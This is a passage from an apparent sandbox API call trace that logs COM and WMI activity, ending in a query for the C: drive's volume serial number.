This=0x6738850, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e298 | out: ppvObject=0x641e298*=0x77bf08) returned 0x0 [0152.990] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bf08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e2a0 | out: pCid=0x641e2a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.990] WbemDefPath:IUnknown:Release (This=0x77bf08) returned 0x3 [0152.990] CoGetContextToken (in: pToken=0x641e2f8 | out: pToken=0x641e2f8) returned 0x0 [0152.990] CoGetContextToken (in: pToken=0x641e700 | out: pToken=0x641e700) returned 0x0 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e790 | out: ppvObject=0x641e790*=0x0) returned 0x80004002 [0152.990] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0152.990] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0152.990] CoGetContextToken (in: pToken=0x641f088 | out: pToken=0x641f088) returned 0x0 [0152.991] CoGetContextToken (in: pToken=0x641efe8 | out: pToken=0x641efe8) returned 0x0 [0152.991] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x641f0b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641f0b4 | out: ppvObject=0x641f0b4*=0x6738850) returned 0x0 [0152.991] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0152.991] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0152.991] WbemDefPath:IWbemPath:SetText (This=0x6738850, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f234*=0x0, pszText=0x0 | out: puBuffLength=0x641f234*=0x20, pszText=0x0) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f234*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f234*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738850, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738850, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738850, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x641f1b8 | out: puCount=0x641f1b8*=0x0) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x641f1a4 | out: puCount=0x641f1a4*=0x2) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0x0, pszText=0x0 | out: puBuffLength=0x641f1a0*=0xf, pszText=0x0) returned 0x0 [0152.991] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0152.991] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f154 | out: ppv=0x641f154*=0x72015c) returned 0x0 [0152.991] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f14c | out: pAptType=0x641f14c*=1) returned 0x0 [0152.991] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f150 | out: ppvObject=0x641f150*=0x0) returned 0x80004002 [0152.991] IUnknown:Release (This=0x72015c) returned 0x1 [0152.992] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eac0 | out: ppv=0x641eac0*=0x6736df8) returned 0x0 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736df8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ecd8 | out: ppvObject=0x641ecd8*=0x0) returned 0x80004002 [0152.993] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736df8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ecec | out: ppvObject=0x641ecec*=0x67388c0) returned 0x0 [0152.993] WbemDefPath:IUnknown:Release (This=0x6736df8) returned 0x0 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e90c | out: ppvObject=0x641e90c*=0x67388c0) returned 0x0 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e8c8 | out: ppvObject=0x641e8c8*=0x0) returned 0x80004002 [0152.993] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e224 | out: ppvObject=0x641e224*=0x0) returned 0x80004002 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e1d4 | out: ppvObject=0x641e1d4*=0x0) returned 0x80004002 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e1e0 | out: ppvObject=0x641e1e0*=0x77bf38) returned 0x0 [0152.993] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bf38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e1e8 | out: pCid=0x641e1e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.993] WbemDefPath:IUnknown:Release (This=0x77bf38) returned 0x3 [0152.993] CoGetContextToken (in: pToken=0x641e240 | out: pToken=0x641e240) returned 0x0 [0152.993] CoGetContextToken (in: pToken=0x641e648 | out: pToken=0x641e648) returned 0x0 [0152.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e6d8 | out: ppvObject=0x641e6d8*=0x0) returned 0x80004002 [0152.994] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0152.994] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0152.994] CoGetContextToken (in: pToken=0x641efd0 | out: pToken=0x641efd0) returned 0x0 [0152.994] CoGetContextToken (in: pToken=0x641ef30 | out: pToken=0x641ef30) returned 0x0 [0152.994] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x641f000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641effc | out: ppvObject=0x641effc*=0x67388c0) returned 0x0 [0152.994] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0152.994] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0152.994] WbemDefPath:IWbemPath:SetText (This=0x67388c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0152.994] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x641f17c | out: puCount=0x641f17c*=0x2) returned 0x0 [0152.994] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=4, puBuffLength=0x641f178*=0x0, pszText=0x0 | out: puBuffLength=0x641f178*=0xf, pszText=0x0) returned 0x0 [0152.994] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=4, puBuffLength=0x641f178*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0152.994] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f17c | out: ppv=0x641f17c*=0x72015c) returned 0x0 [0152.994] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f174 | out: pAptType=0x641f174*=1) returned 0x0 [0152.994] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f178 | out: ppvObject=0x641f178*=0x0) returned 0x80004002 [0152.994] IUnknown:Release (This=0x72015c) returned 0x1 [0152.995] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641ed98 | out: ppv=0x641ed98*=0x673ee58) returned 0x0 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x673ee58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641efb0 | out: ppvObject=0x641efb0*=0x0) returned 0x80004002 [0152.996] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ee58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641efc4 | out: ppvObject=0x641efc4*=0x6736fb8) returned 0x0 [0152.996] WbemLocator:IUnknown:Release (This=0x673ee58) returned 0x0 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ebe4 | out: ppvObject=0x641ebe4*=0x6736fb8) returned 0x0 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eba0 | out: ppvObject=0x641eba0*=0x0) returned 0x80004002 [0152.996] WbemLocator:IUnknown:AddRef (This=0x6736fb8) returned 0x3 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e4fc | out: ppvObject=0x641e4fc*=0x0) returned 0x80004002 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e4ac | out: ppvObject=0x641e4ac*=0x0) returned 0x80004002 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e4b8 | out: ppvObject=0x641e4b8*=0x0) returned 0x80004002 [0152.996] CoGetContextToken (in: pToken=0x641e518 | out: pToken=0x641e518) returned 0x0 [0152.996] CoGetContextToken (in: pToken=0x641e920 | out: pToken=0x641e920) returned 0x0 [0152.996] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9b0 | out: ppvObject=0x641e9b0*=0x0) returned 0x80004002 [0152.996] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x2 [0152.996] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x1 [0152.997] CoGetContextToken (in: pToken=0x641ef90 | out: pToken=0x641ef90) returned 0x0 [0152.997] CoGetContextToken (in: pToken=0x641eef0 | out: pToken=0x641eef0) returned 0x0 [0152.997] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x641efc0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x641efbc | out: ppvObject=0x641efbc*=0x6736fb8) returned 0x0 [0152.997] WbemLocator:IUnknown:AddRef (This=0x6736fb8) returned 0x3 [0152.997] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x2 [0152.997] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x641f158 | out: puCount=0x641f158*=0x2) returned 0x0 [0152.997] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=8, puBuffLength=0x641f154*=0x0, pszText=0x0 | out: puBuffLength=0x641f154*=0xf, pszText=0x0) returned 0x0 [0152.997] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=8, puBuffLength=0x641f154*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f154*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0152.997] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x641f030 | out: ppv=0x641f030*=0x6737038) returned 0x0 [0152.997] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737038, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x641f0c4 | out: ppNamespace=0x641f0c4*=0x672ef9c) returned 0x0 [0154.755] WbemLocator:IUnknown:QueryInterface (in: This=0x672ef9c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef60 | out: ppvObject=0x641ef60*=0x7819f4) returned 0x0 [0154.755] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7819f4, pProxy=0x672ef9c, pAuthnSvc=0x641efb0, pAuthzSvc=0x641efac, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8, pImpLevel=0x641ef98, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0 | out: pAuthnSvc=0x641efb0*=0xa, pAuthzSvc=0x641efac*=0x0, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8*=0x6, pImpLevel=0x641ef98*=0x2, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0*=0x1) returned 0x0 [0154.755] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x1 [0154.755] WbemLocator:IUnknown:QueryInterface (in: This=0x672ef9c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef54 | out: ppvObject=0x641ef54*=0x781a14) returned 0x0 [0154.755] WbemLocator:IUnknown:QueryInterface (in: This=0x672ef9c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef50 | out: ppvObject=0x641ef50*=0x7819f4) returned 0x0 [0154.755] WbemLocator:IClientSecurity:SetBlanket (This=0x7819f4, pProxy=0x672ef9c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0154.755] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x2 [0154.755] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x1 [0154.755] CoTaskMemFree (pv=0x77e058) [0154.755] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x0 [0155.795] WbemLocator:IUnknown:QueryInterface (in: This=0x672ef9c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eb50 | out: ppvObject=0x641eb50*=0x781a14) returned 0x0 [0155.795] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eb0c | out: ppvObject=0x641eb0c*=0x0) returned 0x80004002 [0155.950] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641e92c | out: ppvObject=0x641e92c*=0x0) returned 0x80004002 [0156.269] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0156.270] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e46c | out: ppvObject=0x641e46c*=0x0) returned 0x80004002 [0156.512] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e41c | out: ppvObject=0x641e41c*=0x0) returned 0x80004002 [0156.514] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e428 | out: ppvObject=0x641e428*=0x781974) returned 0x0 [0156.514] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781974, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e430 | out: pCid=0x641e430*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.514] WbemLocator:IUnknown:Release (This=0x781974) returned 0x3 [0156.514] CoGetContextToken (in: pToken=0x641e488 | out: pToken=0x641e488) returned 0x0 [0156.514] CoGetContextToken (in: pToken=0x641e890 | out: pToken=0x641e890) returned 0x0 [0156.514] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e920 | out: ppvObject=0x641e920*=0x7819fc) returned 0x0 [0156.514] WbemLocator:IRpcOptions:Query (in: This=0x7819fc, pPrx=0x781a14, dwProperty=2, pdwValue=0x641e948 | out: pdwValue=0x641e948) returned 0x80004002 [0156.514] WbemLocator:IUnknown:Release (This=0x7819fc) returned 0x3 [0156.514] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0156.514] CoGetContextToken (in: pToken=0x641ee60 | out: pToken=0x641ee60) returned 0x0 [0156.514] CoGetContextToken (in: pToken=0x641edc0 | out: pToken=0x641edc0) returned 0x0 [0156.514] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x641ee90*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x641ee8c | out: ppvObject=0x641ee8c*=0x672ef9c) returned 0x0 [0156.514] WbemLocator:IUnknown:AddRef (This=0x672ef9c) returned 0x4 [0156.514] WbemLocator:IUnknown:Release (This=0x672ef9c) returned 0x3 [0156.536] WbemLocator:IUnknown:Release (This=0x672ef9c) returned 0x2 [0156.536] SysStringLen (param_1=0x0) returned 0x0 [0156.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x641f228 | out: puCount=0x641f228*=0x0) returned 0x0 [0156.536] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f224*=0x0, pszText=0x0 | out: puBuffLength=0x641f224*=0x20, pszText=0x0) returned 0x0 [0156.536] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f224*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f224*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.536] CoGetContextToken (in: pToken=0x641ee98 | out: pToken=0x641ee98) returned 0x0 [0156.536] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0156.536] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ed2c | out: ppvObject=0x641ed2c*=0x781a14) returned 0x0 [0156.536] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x3 [0156.536] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0156.536] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f22c*=0x0, pszText=0x0 | out: puBuffLength=0x641f22c*=0x20, pszText=0x0) returned 0x0 [0156.536] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=2, puBuffLength=0x641f22c*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f22c*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.537] IWbemServices:GetObject (in: This=0x672ef9c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x641f1e0*=0x0, ppCallResult=0x0 | out: ppObject=0x641f1e0*=0x673b930, ppCallResult=0x0) returned 0x0 [0158.845] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x641f1e0 | out: puCount=0x641f1e0*=0x2) returned 0x0 [0158.845] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=4, puBuffLength=0x641f1dc*=0x0, pszText=0x0 | out: puBuffLength=0x641f1dc*=0xf, pszText=0x0) returned 0x0 [0158.845] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=4, puBuffLength=0x641f1dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.845] IWbemClassObject:Get (in: This=0x673b930, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3663500*=0, plFlavor=0x3663504*=0 | out: pVal=0x641f1dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3663500*=8, plFlavor=0x3663504*=0) returned 0x0 [0158.845] SysStringByteLen 